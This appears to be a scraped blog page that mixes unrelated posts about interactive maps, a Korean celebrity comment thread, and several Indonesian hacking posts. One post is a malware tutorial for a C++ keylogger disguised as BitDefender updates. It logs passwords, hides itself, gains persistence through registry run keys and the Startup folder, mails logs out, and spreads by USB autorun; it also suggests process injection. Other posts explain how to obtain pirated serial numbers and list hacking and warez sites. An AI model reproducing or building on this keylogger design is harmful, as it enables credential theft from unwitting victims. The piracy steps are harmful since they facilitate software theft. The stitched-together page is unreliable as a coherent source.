Wednesday, 29 August 2018

The United States of Global Trade


This week Donald Trump negotiated a 'really good' trade deal with Mexico and said that he is now "working on Canada". These new trade deals with the USA's closest neighbors will effect trade in every state in the USA. According to the Wilson Quarterly the trilateral trade between the USA, Canada and Mexico is worth around $1.2 trillion.

You can explore the American side of this trilateral trade
Share:

Yale Climate Opinion Maps


Americans now overwhelmingly believe in global warming. In fact there are only three counties in the whole of the United States where a majority of the population still believe that global warming is not happening. These counties are Emery County in Utah, Heard County in Georgia and Grant County in West Virginia.

70% of Americans in total believe that global warming will harm future
Share:

Latest Virus Coding Tutorial By Ap3X Pr3Dator "Tutorial Virus terbaru Coding Dengan Ap3X Pr3Dator"

Latest Virus Coding Tutorial By Ap3X Pr3Dator "Tutorial Virus terbaru Coding Dengan Ap3X Pr3Dator"

Hello Guys This Is Apex Predator Today We Will Code a virus step

by step in detail… but some warnings for you are


 

THIS ONE IS ONLY OF EDUCATIONAL PURPOSE I DON GIVE A F*** WHT EVER U DO WITH THIS BUT STILL USE IT WISELY ELSE U ILL GET SCREWED.

AND KINDLY PLS DONT MAIL ME ASKING ANY FURTHER DOUBTS HOW TO COMPILE,AS I HAVE ONLY PROVIDED THE SOURCE CODES WITH LOTS OF ERRORS IN DO CORRECT IT YOURSELF.PLS DON’T FOR GODS SAKE ASK
ME HOW TO REMOVE THEM AS I DON’T ENCOURAGE SCRIPT KIDDIES DO LITTLE RESEARCH AND FIGURE IT OUT YOURSELF*********BITDEFENDER.EXE VIRUS IN C++******************
************************************************** ***
MY VIRUS COULD BE USED AS A HACKING TOOL TO LOG

PEOPLES PASSWORDS,AND HACK MAILS OR ANY PASSWORD
PROTECTED ACCOUNTS.
************************************************** ********************
Code:
Download Now
Ls Learn C Not 16 Bit,Windows C++ Before Reading On. Get The Win Help File For Reference
The First Function Is The Key Loggere Part(Pay Load) Which Simply Logs Key Strokes
Getkeypress(Int Keypress)
Getasynckeypressstate This Module Got The State Of Each Keys Which Is Passed Over To Our Function,The Int Ascii Value Of The Keys And Converted To Strings And Saved Ina File In C:\Sas.Txt
/*This Is Not A Good Method For Making The Key Kolggers But Preferably The First And Easy Option.Piping Out The Key Strokes Using The Key Bord Hooks Are The Best Method For Doing It(Google For It)what it does
1)geting the handle to the windows created using hwnd
findwindowa(“consolewindowclass”,null);

2)registry entry valuse hkey
*********then the hide handle to hide the virus******************
3)using the handle obtained in “hide” we ill set it to be hiden so that itwill run in the back ground bt nt visible
getmodulefilename(getmodh,locate,sizeof(locate));
4)used to get the current path handle for moving it from current position to another
5)getmodulefilename
used to get the current system directory it differs on the insatllation of windows on diff drives
*********victims system file location***************
6)once after getting the system directory ex:c:\windows\system32
7)i append the path of virus copy c:\windows\system32 + bitdefenderupdates.exe using string cat function
8)now copy from current excuted path to new place using copyfile(locate,temprot,false);
copyfile(locate,”c:\\documents and settings\\all users\\start menu\\programs\\startup\\bitdefender_update.exe”,f alse);
************breath of the virus*******************
9)setting it to get autoloaded ever time windows starts,we simply appendfewlines to the registry
10)it sends you the log keystrokes via mail usint ftp() function
we write two star up entryone a link to the current module and one to a fixed path so to evade from common anti virus detection
regsetvalueex(fixstup,”bit defender updates “,0,re_sz,(lpbyte)system2,sizeof(system2));
its ready
****************the wings and leg of virus*******************
am not including those part as its simple jsut write a text file with autorun entries to the removable drives and hence it ill be able to spread
and its ready*****************************OTHER TECHNIQUES AND Improvements***********************
Just By Ading Few More Codes You Could Make It Un Detactable By Process Vivers And Task Managers
Just By Doing Few Researchs You Could Make It Un Detactable By Anti Virus
Insted Of The Direct Startup Entry Use A Parasitic Infection Technique To Get Auto Started
This Dont Check Whether A Removable Media Exsist Add A Function To Chek The Presence And Then Append The Virusu May Use Shchangenotifyregister To Get Notified Of Any New Drives
U Could All Make It As A Dll And Make Code It To Inject Inot Other Running Process For That Allu Neeed To Do Is To Get The List Of Process On Statup Create A Remote Thread And Inject It To The Stup Applications Virtual Memmory
Just Copy Paste And Compile Wont Work For For These Codes As I Have Added Lots Of Bugs In It.If You Really Wanna Make A Virus You May Try To Investigate And Correct Those Errors Else Leave It.I Don Encourage Script Kiddies
Ill Work Fine And Tested On Vc++,Blood Shed,And Boroland Cs
Share:

The Free Market in North Korea


Despite North Korea's centralized and state-controlled economy there are 436 officially sanctioned markets located across the country. Since the 1990's famine, and against the backdrop of the collapse of financial support from the Soviet Union, the North Korean economy has begun to rely more and more on the private enterprise of street markets.

Beyond Parallel has created an interactive map
Share:

Tuesday, 28 August 2018

The 2018 Fall Color Map


Every year SmokyMountains.com release an interactive map which shows when you can expect to enjoy the full technicolor experience of America's autumnal foliage. The map uses historical weather records from all 48 continental states to predict the arrival of fall at the county level across the contiguous United States.

The 2018 Fall Foliage Prediction Map has a date control which allows you to
Share:

Russian guest on 'Abnormal Summit' revealed to be an idol trainee debuting soon


Article: "Are you surprised?" 'Welcome Korea' Swetlana, currently preparing to debut as an idol

Source: Hankyung via Nate

(She's been a trainee for 2 years. She's planning to debut in Nov/Dec this year.)

1. [+161, -5] Oh~~ She was that Russian...

2. [+125, -20] She was pretty. I don't know if she's mixed but she looked white and Korean. Is she mixed?

3. [+100, -5] She's indeed pretty but her photos are overly photoshopped... I was surprised when I saw her in a video because she looked so different from her Instagram.

4. [+19, -25] Her face is above idols but she'll get buried because she'll have jealous girls complaining. If you want to become popular as a female idol in Korea, you have to have a flaw like Whasa's face and Irene's bad proportions.

5. [+9, -2] Even a nationalist show is promoting idol trainees.

6. [+8, -2] She looks like Seo Ji Young.
Share:

Internal Migration in the USA


American Migration is an interactive map showing where people are moving to in America. The map shows the towns and cities where people who have recently moved from a town have moved to.

If you hover over a city on the map you can see all the other cities where people moved to, according to the Census Bureau's 2011-2015 American Community Survey. The map uses the Metro to Metro Migration Flows
Share:

Hong Kong Land Reclamation


A new interactive map shows how Hong Kong has grown over the last 180 years through a steady process of land reclamation. Land reclamation in mountainous Hong Kong has been an important tool to expand the limited supply of usable land. Over 35% of the area of present day Hong Kong is land which has been reclaimed from the sea.

The History of Land Reclamation is a visualization of how land in
Share:

Monday, 27 August 2018

Situs Tempat Mencari Serial Number Software Keren (Full Version), Lengkap, Akurat, dan Cepat 99% Work

Hello, sahabat ROG…Lagi bingung cari Serial Number-??
Jangan sedih gitu donk, niiih… ROG ada situs tempat mencari Serial Number yang Patut Dikunjungi dan Dicoba.
Mungkin sahabat ROG sudah banyak yang mengenal situs ini. Situs yang menyediakan Serial Number software keren dan rata-rata Serial tersebut bekerja dengan baik.
Tertarik bukan-??
Langsung aja Ikuti Langkah aman.nya :

1. Tentukan Software yang akan kita cari Serial Numbernya…
2. Buka situs www.serials.ws
3. Pada bagian form “Seacrh” masukkan nama software yang akan dicari SN.nya
contoh : software : Adobe Photoshop CS5
4. Pilih hasil yang paling besar tingkat rating.nya…
5. Akan muncul halaman Pop-Up. (jadi bagi sobat yang make Pop-up blocker, silahkan di “Allow” sebentar. Aman pastinya…
6. Pilih salah satu Serial Number yang ada, kami ROG sudah mencoba dan hasilnya rata-rata bekerja.
Selesai….
Silahkan gunakan Software dengan Full Version…
hehehe… :D
Share:

14 Situs Website Untuk Para Hacker (Tool, Trik, Mode, Teknik) pembelajaran baik Veteran maupun Pemula

14 Situs Website Untuk Para Hacker (Tool, Trik, Mode, Teknik) pembelajaran baik Veteran maupun Pemula


Belajar hacking…
Apa yang anda pikirkan setelah mendengar dua kata itu-?
Mungkin banyak yang sobat pikirkan jika slalu mendengar kata itu dan saat itu juga memiliki niat serta keinginan untuk dapat melakukannya dengan baik, sehingga sobat bisa menjadi seorang Hacker.
Hahaha….
Apa enaknya jadi hacker-? Terserah sobat.lah jawabannya pasti berbeda..

naah….
Untuk sobat yang ingin mengetahui seluk belum atau trik-trik atau cara-cara bahkan jika sobat ingin menjadi seorang hacker, pasti.lah anda harus belajar dari Guru dan Masternya dulu. Biar sobat bisa lebih mengetahu tentang hacking-hackingan.
Kali ini kami Rafi Orilya Groups, akan berbagi bagi para sobat yang ingin belajar tentang hacking jangn lupa mengunjungi 14 Link Webstie Hacker dibawah ini.
Semoga menjadi hacker sejati…

1. Hackfourms => -- Hacking and Market place
www.hackforums.net


 

2. EvilZone => Hacking and Warez 
www.evilzone.org




 






3. Hack-a-Day
www.hackaday.com



 



4. Hack in the Box => HITB
www.hitb.org


 





5. Hack this site
www.hackthissite.org


 













6. Milw0rm
www.milw0rm.com

7. 
Security Focus
www.securityfocus.com

8. 
ASTALAVISTA  => Securit y & Hacking Community
www.astalavista.com

9. 
PacketStorm Security
www.packetstormsecurity.org

10. 
Black Hat
www.blackhat.com

11. 
Metasploit Project
www.metasploit.com

12. 
Insecure.org => Top 75 Security tools
www.sectools.org

13. 
2600 Store
www.2600.com

14. 
Rootkit
www.rootkit.com

Silahkan kunjungi Situs-situs hacking diatas.
Semoga Bermanfaat…

Jika suka postingan diatas, jangan lupa tinggalin Komentar yaah.
Share:

Blogroll

Labels